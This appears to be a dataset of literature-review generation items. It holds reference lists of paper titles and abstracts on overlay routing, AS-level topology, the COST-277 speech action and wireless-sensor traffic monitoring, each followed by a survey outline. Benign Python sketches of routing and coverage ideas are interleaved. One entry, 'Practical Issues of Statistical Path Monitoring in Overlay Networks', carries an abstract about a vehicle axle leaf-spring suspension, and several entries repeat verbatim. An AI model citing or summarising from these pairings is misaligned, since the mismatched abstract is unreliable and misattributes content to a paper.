upstream provider AS. Key criteria that are explicitly accounted for in the formulation of these multi-objective optimization problems are (i) AS-geography, i.e., locality and number of PoPs within individual ASs; (ii) AS-specific business models, abstract toy models that describe how individual ASs choose their "best" provider; and (iii) AS evolution, a historic account of the "lives" of individual ASs in a dynamic ISP market. 
We show that the resulting model is broadly robust, perforce yields graphs that match inferred AS connectivity with respect to a number of different metrics, and is ideal for exploring the impact of new peering incentives or policies on AS-level connectivity. --- paper_title: A distributed approach to topology-aware overlay path monitoring paper_content: Path probing is essential to maintain an efficient overlay network topology. However, the cost of complete probing can be as high as O(n/sup 2/), which is prohibitive in large-scale overlay networks. Recently we proposed a method that trades probing overhead for inference accuracy in sparse networks such as the Internet. The method uses physical path information to infer path quality for all of the n/spl times/(n-1) overlay paths, while actually probing only a subset of the paths. We propose and evaluate a distributed approach to implement this method. We describe a minimum diameter, link-stress bounded overlay spanning tree, which is used to collect and disseminate path quality information. All nodes in the tree collaborate to infer the quality of all paths. Simulation results show this approach can achieve a high-level of inference accuracy while reducing probing overhead and balancing link stress on the spanning tree. --- paper_title: Improving multipath reliability in topology-aware overlay networks paper_content: Use of multiple paths between node pairs can enable an overlay network to bypass Internet link failures. Selecting high quality primary and backup paths is challenging, however. To maximize communication reliability, an overlay multipath routing protocol must account for both the failure probability of a single path and link sharing among multiple paths. We propose a practical solution that exploits physical topology information and end-to-end path quality measurement results to select high quality path pairs. Simulation results show the proposed approach is effective in achieving higher multipath reliability in overlay networks at reasonable communication cost. --- paper_title: On the cost-quality tradeoff in topology-aware overlay path probing paper_content: Path probing is essential to maintaining an efficient overlay network topology. However, the cost of a full-scale probing is as high as O(n/sup 2/), which is prohibitive in large-scale overlay networks. Several methods have been proposed to reduce probing overhead, although at a cost in terms of probing completeness. In this paper, an orthogonal solution is proposed that trades probing overhead for estimation accuracy in sparse networks such as the Internet. The proposed solution uses network-level path composition information (for example, as provided by a topology server) to infer path quality without full-scale probing. The inference metrics include latency, loss rate and available bandwidth. This approach is used to design several probing algorithms, which are evaluated through analysis and simulation. The results show that the proposed method can significantly reduce probing overhead while providing hounded quality estimations for all n /spl times/ (n - 1) overlay paths. The solution is well suited to medium-scale overlay networks in the Internet. In other environments, it can be combined with extant probing algorithms to further improve performance. 
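The topology-aware multipath entries above select backup paths that share as few physical links as possible with the primary path. The following sketch shows one simple way to encode that preference; the paths, link names, and delay estimates are made up for illustration and do not come from the cited papers.

```python
# Minimal sketch of topology-aware backup-path selection: among candidate
# detour paths (represented as link sets), prefer the one sharing the fewest
# physical links with the primary, breaking ties by estimated delay.
primary = {"A-B", "B-C", "C-D"}

candidates = {
    "via relay R1": ({"A-E", "E-C", "C-D"}, 61.0),   # (link set, est. delay ms)
    "via relay R2": ({"A-F", "F-G", "G-D"}, 74.0),
    "via relay R3": ({"A-B", "B-G", "G-D"}, 55.0),
}

def backup_score(links, delay, primary):
    overlap = len(links & primary)        # shared physical links with primary
    return (overlap, delay)               # lexicographic: disjointness first

best = min(candidates, key=lambda name: backup_score(*candidates[name], primary))
for name, (links, delay) in candidates.items():
    print(f"{name}: shared links = {len(links & primary)}, delay = {delay} ms")
print("selected backup:", best)
```

A correlated-failure model, as in the backup path allocation entry earlier in this list, would replace the raw overlap count with an estimated joint failure probability.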
--- paper_title: Characterizing selfishly constructed overlay routing networks paper_content: We analyze the characteristics of overlay routing networks generated by selfish nodes playing competitive network construction games. We explore several networking scenarios - some simplistic, others more realistic - and analyze the resulting Nash equilibrium graphs with respect to topology, performance, and resilience. We find a fundamental tradeoff between performance and resilience, and show that limiting the degree of nodes is of great importance in controlling this balance. Further, by varying the cost function, the game produces widely different topologies; one parameter in particular - the relative cost between maintaining an overlay link and increasing the path length to other nodes - can generate topologies with node-degree distributions whose tails vary from exponential to power-law. We conclude that competitive games can create overlay routing networks satisfying very diverse goals. --- paper_title: Comparing the structure of power-law graphs and the Internet AS graph paper_content: In this work we devise algorithmic techniques to compare the interconnection structure of the Internet AS graph with that of graphs produced by topology generators that match the power-law degree distribution of the AS graph. We are guided by the existing notion that nodes in the AS graph can be placed in tiers with the resulting graph having an hierarchical structure. Our techniques are based on identifying graph nodes at each tier, decomposing the graph by removing such nodes and their incident edges, and thus explicitly revealing the interconnection structure of the graph. We define quantitative metrics to analyze and compare the decomposition of synthetic power-law graphs with the Internet-AS graph. Through experiments, we observe qualitative similarities in the decomposition structure of the different families of power-law graphs and explain any quantitative differences based on their generative models. We believe our approach provides insight into the interconnection structure of the AS graph and finds continuing applications in evaluating the representativeness of synthetic topology generators. --- paper_title: The Rich-Club Phenomenon In The Internet Topology paper_content: We show that the Internet topology at the autonomous system (AS) level has a rich-club phenomenon. The rich nodes, which are a small number of nodes with large numbers of links, are very well connected to each other. The rich-club is a core tier that we measured using the rich-club connectivity and the node-node link distribution. We obtained this core tier without any heuristic assumption between the ASs. The rich-club phenomenon is a simple qualitative way to differentiate between power law topologies and provides a criterion for new network models. To show this, we compared the measured rich-club of the AS graph with networks obtained using the Baraba/spl acute/si-Albert (BA) scale-free network model, the Fitness BA model and the Inet-3.0 model. --- paper_title: Race Conditions in Coexisting Overlay Networks paper_content: By allowing end hosts to make independent routing decisions at the application level, different overlay networks may unintentionally interfere with each other. This paper describes how multiple similar or dissimilar overlay networks could experience race conditions, resulting in oscillations (in both route selection and network load) and cascading reactions. 
We pinpoint the causes for synchronization and derive an analytic formulation for the synchronization probability of two overlays. Our model indicates that the probability of synchronization is non-negligible across a wide range of parameter settings, thus implying that the ill effects of synchronization should not be ignored. Using the analytical model, we find an upper bound on the duration of traffic oscillations. We also show that the model can be easily extended to include a large number of co-existing overlays. We validate our model through simulations that are designed to capture the transient routing behavior of both the IP- and overlay-layers. We use our model to study the effects of factors such as path diversity (measured in round trip times) and probing aggressiveness on these race conditions. Finally, we discuss the implications of our study on the design of path probing process in overlay networks and examine strategies to reduce the impact of race conditions. --- paper_title: Brocade: Landmark Routing on Overlay Networks paper_content: Recent work such as Tapestry, Pastry, Chord and CAN provide efficient location utilities in the form of overlay infrastructures. These systems treat nodes as if they possessed uniform resources, such as network bandwidth and connectivity. In this paper, we propose a systemic design for a secondaryoverlay of super-nodes which can be used to deliver messages directly to the destination's local network, thus improving route efficiency. We demonstrate the potential performance benefits by proposing a name mapping scheme for a Tapestry-Tapestry secondary overlay, and show preliminary simulation results demonstrating significant routing performance improvement. --- paper_title: Drafting behind Akamai (travelocity-based detouring) paper_content: To enhance web browsing experiences, content distribution networks (CDNs) move web content "closer" to clients by caching copies of web objects on thousands of servers worldwide. Additionally, to minimize client download times, such systems perform extensive network and server measurements, and use them to redirect clients to different servers over short time scales. In this paper, we explore techniques for inferring and exploiting network measurements performed by the largest CDN, Akamai; our objective is to locate and utilize quality Internet paths without performing extensive path probing or monitoring.Our contributions are threefold. First, we conduct a broad measurement study of Akamai's CDN. We probe Akamai's network from 140 PlanetLab vantage points for two months. We find that Akamai redirection times, while slightly higher than advertised, are sufficiently low to be useful for network control. Second, we empirically show that Akamai redirections overwhelmingly correlate with network latencies on the paths between clients and the Akamai servers. Finally, we illustrate how large-scale overlay networks can exploit Akamai redirections to identify the best detouring nodes for one-hop source routing. Our research shows that in more than 50% of investigated scenarios, it is better to route through the nodes "recommended" by Akamai, than to use the direct paths. Because this is not the case for the rest of the scenarios, we develop lowoverhead pruning algorithms that avoid Akamai-driven paths when they are not beneficial. 
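The one-hop detour idea running through the entries above (including the Akamai-driven relay selection) reduces to comparing the direct path against the best source-relay-destination estimate and keeping the detour only when it actually helps. The sketch below assumes hypothetical RTT values; a real system would obtain them from probing or from CDN redirections and would prune unhelpful relays over time.

```python
# Minimal sketch of one-hop detour selection: route via an intermediate node
# only when the two-hop estimate beats the direct path. RTTs are invented.
rtt = {
    ("src", "dst"): 180.0,
    ("src", "relay1"): 40.0, ("relay1", "dst"): 70.0,
    ("src", "relay2"): 90.0, ("relay2", "dst"): 120.0,
}
relays = ["relay1", "relay2"]

def best_one_hop(src, dst, relays, rtt):
    direct = rtt[(src, dst)]
    scored = [(rtt[(src, r)] + rtt[(r, dst)], r) for r in relays]
    detour_rtt, relay = min(scored)
    # "Pruning": keep the direct path unless the detour is strictly better.
    return (relay, detour_rtt) if detour_rtt < direct else (None, direct)

relay, latency = best_one_hop("src", "dst", relays, rtt)
print("chosen relay:", relay or "direct path", "| estimated RTT:", latency, "ms")
```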
--- paper_title: Characterizing selfishly constructed overlay routing networks paper_content: We analyze the characteristics of overlay routing networks generated by selfish nodes playing competitive network construction games. We explore several networking scenarios - some simplistic, others more realistic - and analyze the resulting Nash equilibrium graphs with respect to topology, performance, and resilience. We find a fundamental tradeoff between performance and resilience, and show that limiting the degree of nodes is of great importance in controlling this balance. Further, by varying the cost function, the game produces widely different topologies; one parameter in particular - the relative cost between maintaining an overlay link and increasing the path length to other nodes - can generate topologies with node-degree distributions whose tails vary from exponential to power-law. We conclude that competitive games can create overlay routing networks satisfying very diverse goals. --- paper_title: Practical Issues of Statistical Path Monitoring in Overlay Networks with Large, Rank-Deficient Routing Matrices paper_content: A conventional form of vehicle axle suspension comprises on each side of a vehicle-a leaf spring pack and a shock absorber system. A height control system may also be included. According to this invention the leaf spring pack is replaced by a single leaf spring and a pair of air springs. The opposite ends of the single leaf spring are shackled to the existing shackle attachments and their vehicle frame mounts. Midway between its ends the single leaf spring is connected to the adjacent axle end by the existing spring-to-axle attachment components. In order to compensate for the difference in thicknesses of leaf spring pack and the single leaf spring at their midpoints, a spacer having a vertical thickness equal to the difference in the thicknesses is mounted on top of the single thickness spring at the axle. Air spring support brackets are symmetrically mounted on the chassis frame member on opposite sides of the axle. The upper end of each air spring is attached to one of the brackets and the lower end of each air spring is attached to the single leaf spring. Preferably a-height control system is provided on each side so as to maintain the chassis at a predetermined level. Except for the single leaf spring and the spacer, the other components may be of the type used in conventional leaf spring pack suspensions. --- paper_title: Exploiting routing redundancy via structured peer-to-peer overlays paper_content: Structured peer-to-peer overlays provide a natural infrastructure for resilient routing via efficient fault detection and precomputation of backup paths. These overlays can respond to faults in a few hundred milliseconds by rapidly shifting between alternate routes. In this paper, we present two adaptive mechanisms for structured overlays and illustrate their operation in the context of Tapestry, a fault-resilient overlay from Berkeley. We also describe a transparent, protocol-independent traffic redirection mechanism that tunnels legacy application traffic through overlays. Our measurements of a Tapestry prototype show it to be a highly responsive routing service, effective at circumventing a range of failures while incurring reasonable cost in maintenance bandwidth and additional routing latency. 
--- paper_title: Race Conditions in Coexisting Overlay Networks paper_content: By allowing end hosts to make independent routing decisions at the application level, different overlay networks may unintentionally interfere with each other. This paper describes how multiple similar or dissimilar overlay networks could experience race conditions, resulting in oscillations (in both route selection and network load) and cascading reactions. We pinpoint the causes for synchronization and derive an analytic formulation for the synchronization probability of two overlays. Our model indicates that the probability of synchronization is non-negligible across a wide range of parameter settings, thus implying that the ill effects of synchronization should not be ignored. Using the analytical model, we find an upper bound on the duration of traffic oscillations. We also show that the model can be easily extended to include a large number of co-existing overlays. We validate our model through simulations that are designed to capture the transient routing behavior of both the IP- and overlay-layers. We use our model to study the effects of factors such as path diversity (measured in round trip times) and probing aggressiveness on these race conditions. Finally, we discuss the implications of our study on the design of path probing process in overlay networks and examine strategies to reduce the impact of race conditions. --- paper_title: Interdomain traffic engineering in a locator/identifier separation context paper_content: The Routing Research Group (RRG) of the Internet Research Task Force (IRTF) is currently discussing several architectural solutions to build an interdomain routing architecture that scales better than the existing one. The solutions family currently being discussed concerns the addresses separation into locators and identifiers, LISP being one of them. Such a separation provides opportunities in terms of traffic engineering. In this paper, we propose an open and flexible solution that allows an ISP using identifier/locator separation to engineer its interdomain traffic. Our solution relies on the utilization of a service that transparently ranks paths using cost functions. We implement a prototype server and demonstrate its benefits in a LISP testbed. --- paper_title: On characterizing BGP routing table growth paper_content: The sizes of the BGP routing tables have increased by an order of magnitude over the last six years. This dramatic growth of the routing table can decrease the packet forwarding speed and demand more router memory space. In this paper, we explore the extent that various factors contribute to the routing table size and characterize the growth of each contribution. We begin with measurement study using routing tables of Oregon Route Views server to determine the contributions of multi-homing, load balancing, address fragmentation, and failure to aggregate to routing table size. We find that the contribution of address fragmentation is the greatest and is three times that of multi-homing or load balancing. The contribution of failure to aggregate is the least. Although multi-homing and load balancing contribute less to routing table size than address fragmentation does, we observe that the contribution of multi-homing and that of load balancing grow faster than the routing table does and that the load balancing has surpassed multihoming becoming the fastest growing contributor. 
Moreover, we find that both load balancing and multi-homing contribute to routing table growth by introducing more prefixes of length greater than 17 but less than 25, which is the fastest growing class of prefixes. Next, we compare the growth of the routing table to the expanding of IP addresses that can be routed and conclude that the growth of routable IP addresses is much slower than that of routing table size. Last, we demonstrate that our findings based on the view derived from the Oregon server are accurate through evaluation using additional 15 routing tables collected from different locations in the Internet. --- paper_title: Delayed Internet routing convergence paper_content: This paper examines the latency in Internet path failure, failover, and repair due to the convergence properties of interdomain routing. Unlike circuit-switched paths which exhibit failover on the order of milliseconds, our experimental measurements show that interdomain routers in the packet-switched Internet may take tens of minutes to reach a consistent view of the network topology after a fault. These delays stem from temporary routing table fluctuations formed during the operation of the border gateway protocol (BGP) path selection process on the Internet backbone routers. During these periods of delayed convergence, we show that end-to-end Internet paths will experience intermittent loss of connectivity, as well as increased packet loss and latency. We present a two-year study of Internet routing convergence through the experimental instrumentation of key portions of the Internet infrastructure, including both passive data collection and fault-injection machines at major Internet exchange points. Based on data from the injection and measurement of several hundred thousand interdomain routing faults, we describe several unexpected properties of convergence and show that the measured upper bound on Internet interdomain routing convergence delay is an order of magnitude slower than previously thought. Our analysis also shows that the upper theoretic computational bound on the number of router states and control messages exchanged during the process of BGP convergence is factorial with respect to the number of autonomous systems in the Internet. Finally, we demonstrate that much of the observed convergence delay stems from specific router vendor implementation decisions and ambiguity in the BGP specification. --- paper_title: MIRO: multi-path interdomain routing paper_content: The Internet consists of thousands of independent domains with different, and sometimes competing, business interests. However, the current interdomain routing protocol (BGP) limits each router to using a single route for each destination prefix, which may not satisfy the diverse requirements of end users. Recent proposals for source routing offer an alternative where end hosts or edge routers select the end-to-end paths. However, source routing leaves transit domains with very little control and introduces difficult scalability and security challenges. In this paper, we present a multi-path inter-domain routing protocol called MIRO that offers substantial flexiility, while giving transit domains control over the flow of traffic through their infrastructure and avoiding state explosion in disseminating reachability information. 
In MIRO, routers learn default routes through the existing BGP protocol, and arbitrary pairs of domains can negotiate the use of additional paths (bound to tunnels in the data plane) tailored to their special needs. MIRO retains the simplicity of BGP for most traffic, and remains backwards compatible with BGP to allow for incremental deployability. Experiments with Internet topology and routing data illustrate that MIRO offers tremendous flexibility for path selection with reasonable overhead. ---
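The MIRO entry that closes this reference list keeps ordinary BGP routes as the default and binds negotiated alternate paths to tunnels for the traffic that needs them. The sketch below is a loose, assumption-laden illustration of that lookup order only; the prefix, next hops, and tunnel label are placeholders, not MIRO's actual data structures.

```python
import ipaddress

# Default BGP route per prefix, plus an optional negotiated tunnel for
# special-needs traffic. All entries are invented for illustration.
bgp_default = {"203.0.113.0/24": "AS7 via peer1"}
negotiated_tunnels = {"203.0.113.0/24": "tunnel to AS9 (low-delay path)"}

def select_route(dst_ip, prefer_alternate=False):
    addr = ipaddress.ip_address(dst_ip)
    for prefix, default_route in bgp_default.items():
        if addr in ipaddress.ip_network(prefix):
            tunnel = negotiated_tunnels.get(prefix)
            if prefer_alternate and tunnel:
                return tunnel          # traffic bound to the negotiated tunnel
            return default_route       # ordinary BGP forwarding otherwise
    return None

print(select_route("203.0.113.8"))
print(select_route("203.0.113.8", prefer_alternate=True))
```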
Title: Finding Alternate Paths in the Internet: A Survey of Techniques for End-to-End Path Discovery Section 1: INTRODUCTION Description 1: Introduce the problem of suboptimal routing in the Internet, the importance of alternate paths, and outline various scenarios where alternate paths can improve end-to-end QoS. Section 2: CRITERIA FOR SELECTING ALTERNATE PATHS Description 2: Discuss the performance metrics and criteria for selecting alternate paths, such as latency, throughput, packet loss, and path disjointness. Section 3: Monitoring Paths Based on Performance Description 3: Explain the methodologies for dynamic path monitoring and ranking alternate paths based on performance metrics. Section 4: Disjoint Paths Description 4: Describe the strategies for selecting the most disjoint paths to avoid shared points of failure and ensure reliable data delivery. Section 5: Multi-path routing Description 5: Explore the concept of multi-path routing and its application in improving data transmission reliability through techniques such as Forward Error Correction (FEC). Section 6: USES OF ALTERNATE PATHS Description 6: Classify the methods of realizing alternate paths, including detour routing, routing deflections, and back-up route construction. Section 7: Detour Routing Description 7: Detail the use of intermediate nodes to create detours around faulty primary paths, highlighting frameworks like Resilient Overlay Networks (RONs). Section 8: Routing Deflections Description 8: Discuss how routers can make localized deflection decisions to find alternate paths around failed links. Section 9: Back-up Routes Description 9: Describe the techniques for constructing backup routes with specific QoS parameters and the process of Fast ReRoute (FRR) setup both inter-domain and intra-domain. Section 10: OPEN RESEARCH ISSUES Description 10: Identify and discuss ongoing research challenges in multi-homing, modifying underlay routing mechanisms, and using alternate paths in Resilient Overlay Networks. Section 11: CONCLUSIONS AND PROPOSALS FOR FUTURE DIRECTIONS OF RESEARCH Description 11: Summarize the survey findings, the effectiveness of current approaches, and propose areas for future research, especially emphasizing deployment of Resilient Overlay Networks and security concerns in underlay routing modifications.
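Section 5 of the outline above covers multi-path routing with techniques such as FEC. As a small numerical aside, the sketch below shows why spreading copies (or coded fragments) over several paths helps: assuming independent, purely illustrative loss rates, the probability that at least one copy arrives grows quickly with the number of paths used.

```python
# Delivery probability when the same packet (or an FEC-coded copy) is sent
# over several paths with independent losses. Loss rates are illustrative,
# and independence is an assumption that real paths may violate.
loss_rates = [0.05, 0.08, 0.12]          # per-path packet loss probabilities

def delivery_probability(loss_rates):
    p_all_lost = 1.0
    for p in loss_rates:
        p_all_lost *= p
    return 1.0 - p_all_lost

for k in range(1, len(loss_rates) + 1):
    print(f"{k} path(s): delivery probability = {delivery_probability(loss_rates[:k]):.6f}")
```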
The COST-277 European Action: An overview
8
--- paper_title: The COST-277 Speech Database paper_content: Databases are fundamental for research investigations. This paper presents the speech database generated in the framework of the COST-277 “Non-linear speech processing” European project, as a result of European collaboration. This database makes it possible to address two main problems: the relevance of bandwidth extension, and the usefulness of watermarking with perceptual shaping at different Watermark-to-Signal ratios. It will be publicly available after the end of the COST-277 action, in January 2006. ---
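The database entry above mentions watermarking evaluated at different Watermark-to-Signal ratios. As a small illustration of that metric only (not of the COST-277 tooling or data), the sketch below computes the ratio in dB for synthetic placeholder signals.

```python
import numpy as np

# Watermark-to-Signal ratio: ratio of watermark power to host-signal power,
# expressed in dB. The signals below are synthetic stand-ins, not COST-277 data.
rng = np.random.default_rng(0)
speech = rng.standard_normal(16000)            # stand-in host signal
watermark = 0.01 * rng.standard_normal(16000)  # stand-in embedded watermark

def watermark_to_signal_ratio_db(watermark, signal):
    return 10.0 * np.log10(np.mean(watermark ** 2) / np.mean(signal ** 2))

print(f"WSR = {watermark_to_signal_ratio_db(watermark, speech):.1f} dB")
```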
Title: The COST-277 European Action: An Overview Section 1: Introduction Description 1: Introduce the COST-277 action and provide a general context and motivation for its establishment. Section 2: Rationale for a Speech Processing COST Action Description 2: Explain the rationale for a global approach in speech processing, highlighting the shortcomings of focusing on isolated areas. Section 3: Management Committee Meetings Description 3: Outline the management and coordination activities, including the administrative and scientific discussions held during various meetings. Section 4: Results and Future Lines Description 4: Summarize the significant outcomes of COST-277, including achievements in collaboration and research, and provide an outlook on future directions. Section 5: Collaboration with Other COST Actions Description 5: Detail the interactions and collaborative efforts between COST-277 and other COST actions, focusing on specific joint projects and interests. Section 6: Collaboration Between Different Countries Description 6: Highlight the inter-country collaborations facilitated by COST-277, using a matrix or diagram to illustrate these collaborations. Section 7: Scientific Results Description 7: Provide an enumeration and brief explanation of the scientific achievements and research activities produced under COST-277. Section 8: Future Lines Description 8: Discuss the plans for the future of the COST-277 community post-project completion, including the final event and continuation of research efforts.
A Survey on Urban Traffic Management System Using Wireless Sensor Networks
15
--- paper_title: A User-Customizable Urban Traffic Information Collection Method Based on Wireless Sensor Networks paper_content: Traffic monitoring can efficiently promote urban planning and encourage better use of public transport. Efficient traffic information collection is one important part of traffic monitoring systems. Based on a technique using wireless sensor networks (WSNs), this paper provides a flexible framework for regional traffic information collection in accordance with user request. This framework serves as a basis for future research in designing and implementing traffic monitoring applications. A two-layer network architecture is established for traffic information acquisition in the context of a WSN environment. In addition, a user-customizable data-centric routing scheme is proposed for traffic information delivery, in which multiple routing-related information is considered for decision-making to meet different user requirements. Simulations have shown good performance of the proposed routing scheme compared with other traditional routing schemes on a real-world urban traffic network. --- paper_title: Efficient Data Propagation in Traffic-Monitoring Vehicular Networks paper_content: Road congestion and traffic-related pollution have a large negative social and economic impact on several economies worldwide. We believe that investment in the monitoring, distribution, and processing of traffic information should enable better strategic planning and encourage better use of public transport, both of which would help cut pollution and congestion. This paper investigates the problem of efficiently collecting and disseminating traffic information in an urban setting. We formulate the traffic data acquisition problem and explore solutions in the mobile sensor network domain while considering realistic application requirements. By leveraging existing infrastructure such as traveling vehicles in the city, we propose traffic data dissemination schemes that operate on both the routing and the application layer; our schemes are frugal in the use of the wireless medium, rendering our system interoperable with the proliferation of competing applications. We introduce the following two routing algorithms for vehicular networks that aim at minimizing communication and, at the same time, adhering to a delay threshold set by the application: 1) delay-bounded greedy forwarding and 2) delay-bounded minimum-cost forwarding. We propose a framework that jointly optimizes the two key processes associated with monitoring traffic, i.e., data acquisition and data delivery, and provide a thorough experimental evaluation based on realistic vehicular traces on a real city map. --- paper_title: Reducing Traffic Jams via VANETs paper_content: A transition from free flow to congested traffic on highways often spontaneously originates, despite the fact that the road could satisfy a higher traffic demand. The reasons for such a traffic breakdown are perturbations caused by human drivers in dense traffic. We present a strategy to reduce traffic congestion with the help of vehicle-to-vehicle communication. Periodically emitted beacons are used to analyze traffic flow and to warn other drivers of a possible traffic breakdown. Drivers who receive such a warning are told to keep a larger gap to their predecessor. By doing so, they are less likely to be the source of perturbations, which can cause a traffic breakdown. 
We analyze the proposed strategy via computer simulations and investigate which fraction of communicating vehicles is necessary until a beneficial influence on traffic flow is observable. We show that penetration rates of 10% and less can have significant influence on traffic flow and travel times. In addition to applying a realistic mobility model, we further increase the degree of realism by the use of empirical traffic data from loop detectors on a German Autobahn. --- paper_title: A model for traffic control in urban environments paper_content: Wireless technologies can help solve traffic congestion in urban environments, where road infrastructures develop slower than the sometimes exponential growth in the number of cars in traffic. We present a model for traffic control and congestion avoidance developed over a vehicular ad-hoc network created between the cars in traffic and the road infrastructure. We propose a solution for monitoring traffic using not only sensors within the road infrastructure, but also the cars themselves acting as data collectors. The traffic control decision, provided by the road infrastructure, is scalable, load-balanced, and based on correction decisions for the route adjustment based on local areas. We present evaluation results that show the capabilities of the proposed congestion avoidance model. --- paper_title: Instrumentation for safe vehicular flow in intelligent traffic control systems using wireless networks paper_content: This paper describes a ZigBee-based wireless system to assist traffic flow on arterial urban roads. Real-time simulation in a laboratory environment is conducted to determine the traffic throughput to avoid possible congestions or ease existing congestions. Random numbers are generated to mimic approaching traffic, and this information is shared by a ZigBee-based real-time wireless network. Wireless nodes are connected to different PLCs representing different traffic lights in a cluster. Once the information is shared, the timing and sequencing decisions are taken collectively in a synchronized manner. In this paper, the information is displayed on SCADA connected to each PLC for viewing the characteristics of continuous vehicular flow. It is found that the topology of the network can play an important role in the throughput of data, which may be critical in safety-critical operations such as the control of traffic lights. This paper aims to highlight some of the possible effects of data flow and time-delays faced by modern intelligent control of traffic lights.
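To give a concrete flavour of the beacon-based congestion-warning strategy described in the "Reducing Traffic Jams via VANETs" abstract above, the following minimal Python sketch estimates local density and mean speed from recently received beacons and decides whether to warn following drivers to enlarge their gap. This is not code from the cited work; the beacon format, window length and all thresholds are illustrative assumptions.

import time
from dataclasses import dataclass, field

# Illustrative parameters; a real deployment would calibrate these empirically.
BEACON_WINDOW_S = 2.0        # only beacons newer than this are counted
DENSITY_WARN_THRESHOLD = 12  # number of in-range neighbours that suggests dense traffic
MIN_SPEED_KMH = 30.0         # mean neighbour speed below this hints at a breakdown

@dataclass
class Beacon:
    sender_id: str
    speed_kmh: float
    received_at: float

@dataclass
class CongestionMonitor:
    beacons: dict = field(default_factory=dict)  # sender_id -> newest Beacon

    def on_beacon(self, beacon: Beacon) -> None:
        # Keep only the most recent beacon per neighbour.
        self.beacons[beacon.sender_id] = beacon

    def should_warn(self, now: float) -> bool:
        recent = [b for b in self.beacons.values() if now - b.received_at <= BEACON_WINDOW_S]
        if len(recent) < DENSITY_WARN_THRESHOLD:
            return False
        mean_speed = sum(b.speed_kmh for b in recent) / len(recent)
        # Dense and slowing traffic: tell followers to keep a larger gap.
        return mean_speed < MIN_SPEED_KMH

if __name__ == "__main__":
    monitor = CongestionMonitor()
    now = time.time()
    for i in range(15):  # simulate 15 neighbours crawling at about 20 km/h
        monitor.on_beacon(Beacon(sender_id=f"car{i}", speed_kmh=20.0, received_at=now))
    print("warn followers:", monitor.should_warn(now))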
--- paper_title: Real time evaluation of shortest remaining processing time based schedulers for traffic congestion control using wireless sensor networks paper_content: Pre-timed traffic signals are inefficient in optimizing the traffic flow throughout the day, resulting in greater waiting times at the intersections particularly in congested urban areas during peak hours. Traffic actuated signals use real time traffic data obtained from sensors at the intersections to service queues intelligently. We developed a test bed for the real time evaluation of adaptive traffic light control algorithms using the microscopic traffic simulation open source software, SUMO (Simulation of Urban Mobility), and the AVR 32-bit microcontroller. An interface was developed between SUMO and the AVR microcontroller in which we used the simulation data generated by SUMO as an input to the microcontroller which executed the scheduling algorithms and sent commands back to SUMO for changing the states of the traffic signals accordingly. We implemented four scheduling algorithms in SUMO through the AVR microcontroller, the effect of the algorithms on the traffic network was studied using SUMO and execution times of the scheduling algorithms were measured using the AVR microcontroller. Through this interface, scheduling algorithms can be evaluated more effectively and accurately as compared to the case in which the algorithms are fed with data using pseudo random number generators. --- paper_title: A Study on Vehicle Detection and Tracking Using Wireless Sensor Networks paper_content: Wireless Sensor network (WSN) is an emerging technology and has great potential to be employed in critical situations. The development of wireless sensor networks was originally motivated by military applications like battlefield surveillance. However, Wireless Sensor Networks are also used in many areas such as Industrial, Civilian, Health, Habitat Monitoring, Environmental, Military, Home and Office application areas. Detection and tracking of targets (eg. animal, vehicle) as it moves through a sensor network has become an increasingly important application for sensor networks. The key advantage of WSN is that the network can be deployed on the fly and can operate unattended, without the need for any pre-existing infrastructure and with little maintenance. The system will estimate and track the target based on the spatial differences of the target signal strength detected by the sensors at different locations. Magnetic and acoustic sensors and the signals captured by these sensors are of present interest in the study. The system is made up of three components for detecting and tracking the moving objects. The first component consists of inexpensive off-the shelf wireless sensor devices, such as MicaZ motes, capable of measuring acoustic and magnetic signals generated by vehicles. The second component is responsible for the data aggregation. The third component of the system is responsible for data fusion algorithms. This paper inspects the sensors available in the market and its strengths and weakness and also some of the vehicle detection and tracking algorithms and their classification. This work focuses the overview of each algorithm for detection and tracking and compares them based on evaluation parameters. --- paper_title: Wireless Sensor Networks for Oceanographic Monitoring: A Systematic Review paper_content: Monitoring of the marine environment has come to be a field of scientific interest in the last ten years. 
The instruments used in this work have ranged from small-scale sensor networks to complex observation systems. Among small-scale networks, Wireless Sensor Networks (WSNs) are a highly attractive solution in that they are easy to deploy, operate and dismantle and are relatively inexpensive. The aim of this paper is to identify, appraise, select and synthesize all high quality research evidence relevant to the use of WSNs in oceanographic monitoring. The literature is systematically reviewed to offer an overview of the present state of this field of study and identify the principal resources that have been used to implement networks of this kind. Finally, this article details the challenges and difficulties that have to be overcome if these networks are to be successfully deployed. --- paper_title: Robust and efficient data collection schemes for vehicular multimedia sensor Networks paper_content: In vehicular multimedia sensor networks vehicles are equipped with cameras and they continuously capture images from urban streets. Then, vehicles can use roadside wireless access points encountered during travel to deliver recorded image data to remote data collectors, in which the information from several multimedia streams is aggregated and processed to enable new services, such as urban surveillance, or traffic and road monitoring. However, due to constraints on the wireless access network the amount of image data that can be transferred from vehicles is limited, and data redundancy should be avoided. In this paper we address this issue by using submodular optimization techniques to develop an efficient data collection algorithm capable of providing data redundancy elimination under network capacity constraints. We also design an alternative decentralized scheme that operates on longer time scales and relies only on basic aggregate information. We use network simulations with realistic vehicular mobility patterns to verify the performance gains of our proposed schemes compared to a baseline system that ignores data redundancy. Simulation results show that our data collection techniques can ensure a more accurate coverage of the road network while significantly reducing the amount of transferred data.
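The submodular-optimization idea mentioned in the "Robust and efficient data collection schemes" abstract above can be illustrated with a generic greedy cost-benefit selection: each candidate image report covers a set of road cells, and reports are chosen under a transfer budget so that redundant coverage is avoided. This is only a sketch of the general technique, not the authors' algorithm; the report identifiers, sizes and budget below are invented for the example.

def greedy_coverage(reports, budget_bytes):
    """Greedy cost-benefit selection: repeatedly pick the report with the best
    newly-covered-cells-per-byte ratio until the transfer budget is exhausted."""
    covered = set()
    chosen = []
    remaining = dict(reports)  # report_id -> (size_bytes, set_of_covered_cells)
    spent = 0
    while remaining:
        best_id, best_gain = None, 0.0
        for rid, (size, cells) in remaining.items():
            if spent + size > budget_bytes:
                continue  # would exceed the capacity constraint
            gain = len(cells - covered) / size  # marginal coverage per byte
            if gain > best_gain:
                best_id, best_gain = rid, gain
        if best_id is None:
            break  # nothing affordable adds new coverage
        size, cells = remaining.pop(best_id)
        covered |= cells
        spent += size
        chosen.append(best_id)
    return chosen, covered

if __name__ == "__main__":
    # Hypothetical candidate reports: id -> (size in bytes, road cells they depict).
    reports = {
        "cam_a": (40_000, {"cell1", "cell2", "cell3"}),
        "cam_b": (25_000, {"cell3", "cell4"}),
        "cam_c": (60_000, {"cell1", "cell2", "cell3", "cell4", "cell5"}),
    }
    print(greedy_coverage(reports, budget_bytes=70_000))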
